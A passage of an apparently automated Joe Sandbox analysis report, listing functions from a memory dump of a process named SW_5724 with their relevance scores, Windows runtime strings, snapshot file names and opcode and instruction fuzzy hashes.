                                                                                  • Instruction ID: 0798edb691b89baf915762fe53066453cd304d939c7f1959ecfe26c8b39bfafa
                                                                                  • Opcode Fuzzy Hash: b0fce257ca16c98bd95a1b2925443c8d1ff56a652ae00fbbeca0e26f21ab79a5
                                                                                  • Instruction Fuzzy Hash: 9551BEB1508B429FD764EF78C6406A7BBE4AF84304F10883EFA9A87641E770D545CBA2
                                                                                  Function 01A5A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 01A5A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 01A5A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 109e4120fbbb973fa6e28f498352c68a4fefd37a39a5c269d4f77de2e2915a86
                                                                                  • Instruction ID: 50d624af05f989ba2e2389d162f93f76f8d0c7f449b0b93916d9481498927c29
                                                                                  • Opcode Fuzzy Hash: 109e4120fbbb973fa6e28f498352c68a4fefd37a39a5c269d4f77de2e2915a86
                                                                                  • Instruction Fuzzy Hash: 8541DE35B08685DBEB11CF59C880BAA7BB8FF84314F1881A6ED05DB292E7B5D900CB50
                                                                                  Function 01A8A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: 500cba6e107daa400282a946d664ff72d64e67ac64dd9134ce407e532cc6984f
                                                                                  • Instruction ID: fbaae02e8d4270028843c9b38a82fa3b85fb42451c8842a4c6c8bf58ed2db0a6
                                                                                  • Opcode Fuzzy Hash: 500cba6e107daa400282a946d664ff72d64e67ac64dd9134ce407e532cc6984f
                                                                                  • Instruction Fuzzy Hash: 5201DCB2651700AFD321EF28CE45B6677E8F785B29F04893AF648C7194E334E804CB4A
                                                                                  Function 01A5C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: fcd6cc271ad0aa9811a45923b55f91d84fac37e1d6b8301c6ffd1ae899eb4015
                                                                                  • Instruction ID: b43c87dda3d85813ecf0c80fa0405eb961404fbb39b5eced588df0391e6451b9
                                                                                  • Opcode Fuzzy Hash: fcd6cc271ad0aa9811a45923b55f91d84fac37e1d6b8301c6ffd1ae899eb4015
                                                                                  • Instruction Fuzzy Hash: A0828C75E083198FEB65CFA9C8807EDBBB5BF48320F148169ED19AB359D7309981CB50
                                                                                  Function 01AD6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 59b5b07adc75d8abdd06927c75581ae07c7bba5ff749c5a5f2d456b30bdfe2f9
                                                                                  • Instruction ID: 6e660b29eb3cc43b6487b9c435f0f9d84a4da5d0e98db427a302feb69b0c643e
                                                                                  • Opcode Fuzzy Hash: 59b5b07adc75d8abdd06927c75581ae07c7bba5ff749c5a5f2d456b30bdfe2f9
                                                                                  • Instruction Fuzzy Hash: 94918271900619BFEB21DFA5CD85FAEBBB8EF18B50F100065F605AB194D774AD44CBA0
                                                                                  Function 01AFE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: d60fa516d0faed1216ae7438949185417ea1b8fcea593dace02be7683aed49c9
                                                                                  • Instruction ID: 650cc756cc70a39dec0dd4e8da79ab059bb34eaab9b63d4fcf6a4c201a865b4e
                                                                                  • Opcode Fuzzy Hash: d60fa516d0faed1216ae7438949185417ea1b8fcea593dace02be7683aed49c9
                                                                                  • Instruction Fuzzy Hash: 2E91B036901249AFDF22ABE5DD48FAFBBB9EF85740F050029F605A7260E7349902CB50
                                                                                  Function 01A8A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: d2cea6e00101eaa898562dfcf01bb928cf6ffc12b93f2e40eb1326d2321faa1b
                                                                                  • Instruction ID: b64094d253b369023350ca695f88fa6147c1747bf0fb5efd1d7fc238a3dd4299
                                                                                  • Opcode Fuzzy Hash: d2cea6e00101eaa898562dfcf01bb928cf6ffc12b93f2e40eb1326d2321faa1b
                                                                                  • Instruction Fuzzy Hash: 04717DB5E0020ADFDF29DF9CC5906AEBBB1BF48B10F14852EE909A7345E7359941CB50
                                                                                  Function 01AF4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 509bbee288dc1bd4d1cfa7efb4eb2bd94098be06e718980f7f801185ec33a3b7
                                                                                  • Instruction ID: 55979bbd9bffd75f3965b4da8d807d245cbe581e39af67f0d59dcb884a7189e8
                                                                                  • Opcode Fuzzy Hash: 509bbee288dc1bd4d1cfa7efb4eb2bd94098be06e718980f7f801185ec33a3b7
                                                                                  • Instruction Fuzzy Hash: 36519072D0022A9BDF15EFD9D940AAFBBB4BF58A50F09412DFA11BB240D7349905CFA4
                                                                                  Function 01A6E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  • Opcode ID: 682b91910574d629d24c81d4785e86d71507ca23ae89a2247364a27d2edcfa22
                                                                                  • Instruction ID: c0d03407fa31c81c3c17036f70a476033b63453e1f79e1561bc73b7bc0dfaf1d
                                                                                  • Opcode Fuzzy Hash: 682b91910574d629d24c81d4785e86d71507ca23ae89a2247364a27d2edcfa22
                                                                                  • Instruction Fuzzy Hash: C841B176618352ABD711DB79C940B6BBBECAF88714F04092DFA84D7180E678DA08C792
                                                                                  Function 01ACC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: a40e6336572c79ff66191db5a68dd94351db660b4a1952517da95f130484ff15
                                                                                  • Instruction ID: a2cf9b1cff985c113a75ede769a3227db36f80bb81c26b66a17243404beb980a
                                                                                  • Opcode Fuzzy Hash: a40e6336572c79ff66191db5a68dd94351db660b4a1952517da95f130484ff15
                                                                                  • Instruction Fuzzy Hash: 154151B1D0012DABDF21DB60CD84FDFB77CAB44724F0045A9AA08AB144DB309E898FA4
                                                                                  Function 01AE6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: f2b02f24210a1cf61f7391f769607b9f9bcf0dfaeb6f848cb96f61746fd39949
                                                                                  • Instruction ID: 53c7a9e54d86a88cfdc6969d461cc2fd21234f1495270800ae220aa1a9062698
                                                                                  • Opcode Fuzzy Hash: f2b02f24210a1cf61f7391f769607b9f9bcf0dfaeb6f848cb96f61746fd39949
                                                                                  • Instruction Fuzzy Hash: 07312A31A007099BEB22DF6DC858BBE7BF8DF65704F144468E948AB282D775D815CB50
                                                                                  Function 01AD892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AD895E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  • Opcode ID: 689d1d3cfd67636850685234c694d4cf7bc81a16bb620dbdc4b2460198c1edbd
                                                                                  • Instruction ID: 00f88e1f515f23d5e057c1007aa749689523a9520c00aa0f6f3050188ad5a117
                                                                                  • Opcode Fuzzy Hash: 689d1d3cfd67636850685234c694d4cf7bc81a16bb620dbdc4b2460198c1edbd
                                                                                  • Instruction Fuzzy Hash: 3B012636200F11AFE7356F6ACD84A5B7B75FF85264B08002DF68397552CB24A840C792
                                                                                  Function 01AF2000 Relevance: .8, Instructions: 757COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6460e5f20793af2598fb96c8b617bd92a4b72ea599a6b5ff4b8b558804df1e64
                                                                                  • Instruction ID: 3daf3f11170ba95881750cbcd708f47f4826527e4bdc8216f3bb350d08fc31df
                                                                                  • Opcode Fuzzy Hash: 6460e5f20793af2598fb96c8b617bd92a4b72ea599a6b5ff4b8b558804df1e64
                                                                                  • Instruction Fuzzy Hash: F742C5756083419BD726CFA8C890B6BBBE5FF88340F48092EFB8697250D771D945CB92
                                                                                  Function 01AE8158 Relevance: .6, Instructions: 617COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7ad03fbe829c4230137243a8d4bda05b95ee58427f5c4f76fd124635b1216eaa
                                                                                  • Instruction ID: cef8283ec8874ca4dfa7c94c68445eff4ebe8f10d5fe6ddf5eb9744947053af3
                                                                                  • Opcode Fuzzy Hash: 7ad03fbe829c4230137243a8d4bda05b95ee58427f5c4f76fd124635b1216eaa
                                                                                  • Instruction Fuzzy Hash: 70424D75E002198FEB25CF69C885BADBBF5FF48300F188199E949EB242D7389985CF50
                                                                                  Function 01A62840 Relevance: .6, Instructions: 605COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1211c375a5111c62892339e12a59b59a8aab0f231d0c55424e7b50380ecb186f
                                                                                  • Instruction ID: 252e5144c5c7162957363e16f9486c9b197ff8273a9c20f5148b3b3eb4a809af
                                                                                  • Opcode Fuzzy Hash: 1211c375a5111c62892339e12a59b59a8aab0f231d0c55424e7b50380ecb186f
                                                                                  • Instruction Fuzzy Hash: 8232E270A007958FEB29CFA9C9947FEBBFABF84304F18411DD54A9B286D735A841CB50
                                                                                  Function 01AFA118 Relevance: .6, Instructions: 591COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7ecc77bf9fbb7f9cd9ab67979031e93634b6ff1a2b0ad9ad864dd3feb23d11e0
                                                                                  • Instruction ID: 16cba53fd3f59e62c7cdeb31f1ceb3341adaeac591e638cda4f992b9ecb6ff2b
                                                                                  • Opcode Fuzzy Hash: 7ecc77bf9fbb7f9cd9ab67979031e93634b6ff1a2b0ad9ad864dd3feb23d11e0
                                                                                  • Instruction Fuzzy Hash: DD22BF742046618BEB25CFADC0947B2BBF1AF44341F18859DFB9A8F286D735E452CB60
                                                                                  Function 01A74A35 Relevance: .4, Instructions: 423COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction ID: 16ec5e8665d93442b97a48e8d2f8dc505a1b2491e9d62203ce2c3e3244fcd2c2
                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction Fuzzy Hash: BEF16C71E0021A9BDB15CFA9C980BBEBBF9BF48710F088169E945AB351E774DD41CB60
                                                                                  Function 01AE892B Relevance: .4, Instructions: 386COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a78214035c6426d92b198baf51f57b21cae53fd5b59a6238e28474bc7abbc239
                                                                                  • Instruction ID: a4f5101afb259482ab31ea2f004525c0fa7938b0b1e2fd6e4c9624a487a6708b
                                                                                  • Opcode Fuzzy Hash: a78214035c6426d92b198baf51f57b21cae53fd5b59a6238e28474bc7abbc239
                                                                                  • Instruction Fuzzy Hash: 14D1EF71E0060A8BDF15CF69C885AFEBBF1AF88304F198169D955E7241E73DE905CB60
                                                                                  Function 01A565D0 Relevance: .4, Instructions: 383COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 257b64ba09cfb467903d9c97665c09fe58592d578df3f97978547f43119cfedf
                                                                                  • Instruction ID: 6b31c264fbfc898006a34ff5557a23364291bc718146fb2d7ece9d35ae01dc88
                                                                                  • Opcode Fuzzy Hash: 257b64ba09cfb467903d9c97665c09fe58592d578df3f97978547f43119cfedf
                                                                                  • Instruction Fuzzy Hash: 9AE18E71608342CFC755CF28C590A6ABBF0FF89314F458A6DE99987352EB31E905CB92
                                                                                  Function 01A48397 Relevance: .4, Instructions: 380COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5d38da8e8f917803ed13c374cc40e164e8da6808f59f1b9ffd0250485069d98
                                                                                  • Instruction ID: 8340cf270355e1064a1f3142094b5a5ce113f9d02377f11cca61f566a9ca2cab
                                                                                  • Opcode Fuzzy Hash: f5d38da8e8f917803ed13c374cc40e164e8da6808f59f1b9ffd0250485069d98
                                                                                  • Instruction Fuzzy Hash: 4DD10771A006069FDB14DFA8D990ABAB7F5FF94304F05862DE916DB281E738D950CB60
                                                                                  Function 01AD8243 Relevance: .3, Instructions: 322COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction ID: 7541c4032057e07a9fa1fb3256cea6d8ae6a438b6b8f71d8c5a6029b7746a370
                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction Fuzzy Hash: D0B17274A00B05AFDB24DFA9C940AABBBB9FF84314F14445DEA1397794DA38E905CB50
                                                                                  Function 01A60535 Relevance: .3, Instructions: 300COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction ID: dd15f36b5677abf64a57a5704627c59f0ae2423c6b53c7faacc30a36b48b1383
                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction Fuzzy Hash: ECB1F871600686AFDB25DB78C990BBEBBFEAF48200F184559E652D7282D730ED81CB50
                                                                                  Function 01A583C0 Relevance: .3, Instructions: 281COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 41aa33d5fe41b63b904932f07eb7e253dc2ea804455158e006790d4804bf02b6
                                                                                  • Instruction ID: 982fc334865102f9a6152cdf990a98c99e971f840afe5154513042edf0a8590d
                                                                                  • Opcode Fuzzy Hash: 41aa33d5fe41b63b904932f07eb7e253dc2ea804455158e006790d4804bf02b6
                                                                                  • Instruction Fuzzy Hash: 13C149741083818FD764CF29C494BABBBF5BF88308F44496DE98987291D778E949CF92
                                                                                  Function 01A4C427 Relevance: .3, Instructions: 280COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5423a83a7a7a6cd0b155804e702cbd1d8bffeebbae259a27188dd24939ec5be
                                                                                  • Instruction ID: 69801e0a0d927281dffb9a1a47c79957b8494cb3abbf8074a70817a738be7118
                                                                                  • Opcode Fuzzy Hash: a5423a83a7a7a6cd0b155804e702cbd1d8bffeebbae259a27188dd24939ec5be
                                                                                  • Instruction Fuzzy Hash: 55B18170A402668BDB24DF68C980BADB3F5EF84710F0485E9D50EE7295EB309D86CB61
                                                                                  Function 01A7E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 439bb3c9eb2af649844c2c8dd8535b472ac1a4e0cdddd082be752f5aa93441a5
                                                                                  • Instruction ID: 5502a7db39ea06d26b52b6212d95c68bdc61ce414562214c75d24250943b7686
                                                                                  • Opcode Fuzzy Hash: 439bb3c9eb2af649844c2c8dd8535b472ac1a4e0cdddd082be752f5aa93441a5
                                                                                  • Instruction Fuzzy Hash: 34A12631E00695AFEF21DB58CD84BEEBBB8BF05714F094165EA00AB292D7749E40CBD1
                                                                                  Function 01A90185 Relevance: .3, Instructions: 276COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95bf3519c532948e30635ae65950260e48cff1a6ee03669b334d2f8d310e2649
                                                                                  • Instruction ID: 4a1493bf97671ff801d28bc6bb892704638e442f2bb6dc9954ed8bea143e67c5
                                                                                  • Opcode Fuzzy Hash: 95bf3519c532948e30635ae65950260e48cff1a6ee03669b334d2f8d310e2649
                                                                                  • Instruction Fuzzy Hash: 0FA1D170B00616DFDF25CF69CA90BAAB7F9FF54758F044029EA4597282DB34E891CB90
                                                                                  Function 01B24500 Relevance: .3, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d99ae061cb01ef0405274f0810e3ebe72fac556daa09206c60ee8c4020a769fa
                                                                                  • Instruction ID: fb2a525702f9b261493942bdea87276af7a279a7db7cb8a1dde2661198f2d7f6
                                                                                  • Opcode Fuzzy Hash: d99ae061cb01ef0405274f0810e3ebe72fac556daa09206c60ee8c4020a769fa
                                                                                  • Instruction Fuzzy Hash: C1A10472A10221DFCB25DF18CA80B6AB7E9FF48704F0545A9F549DBA11D374EC05CB91
                                                                                  Function 01B22B57 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction ID: a3b0c9b3f8f33afecc67a3baea572f00d81c6db9754c2c315e4d7662e8ec6b42
                                                                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction Fuzzy Hash: 8DB13B71E0062ADFDF19CFA9C980AADB7B5FF48350F1481A9E918E7354D730A949CB90
                                                                                  Function 01AD60E0 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: baf62a494416b65dd587cb451a2e1851c1be1ee64c395a42f9a308ad1190f567
                                                                                  • Instruction ID: 93d6264e8fdde692b7e1748e2340d4d58801cc8168ad1cd72eae1a1f948e09cb
                                                                                  • Opcode Fuzzy Hash: baf62a494416b65dd587cb451a2e1851c1be1ee64c395a42f9a308ad1190f567
                                                                                  • Instruction Fuzzy Hash: 5B91A371D00616AFDF15CFA9D884BBEBFB5AF48710F154169E61AEB341D734EA008BA0
                                                                                  Function 01A6E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1af3626875d976562f5a183a648caff672c949ec3a46bb661c9f5c5f9793a6f
                                                                                  • Instruction ID: 9b4f2df2601ffc9f71325177fffdaca2c640f3eda660a10015394496cbc06f07
                                                                                  • Opcode Fuzzy Hash: a1af3626875d976562f5a183a648caff672c949ec3a46bb661c9f5c5f9793a6f
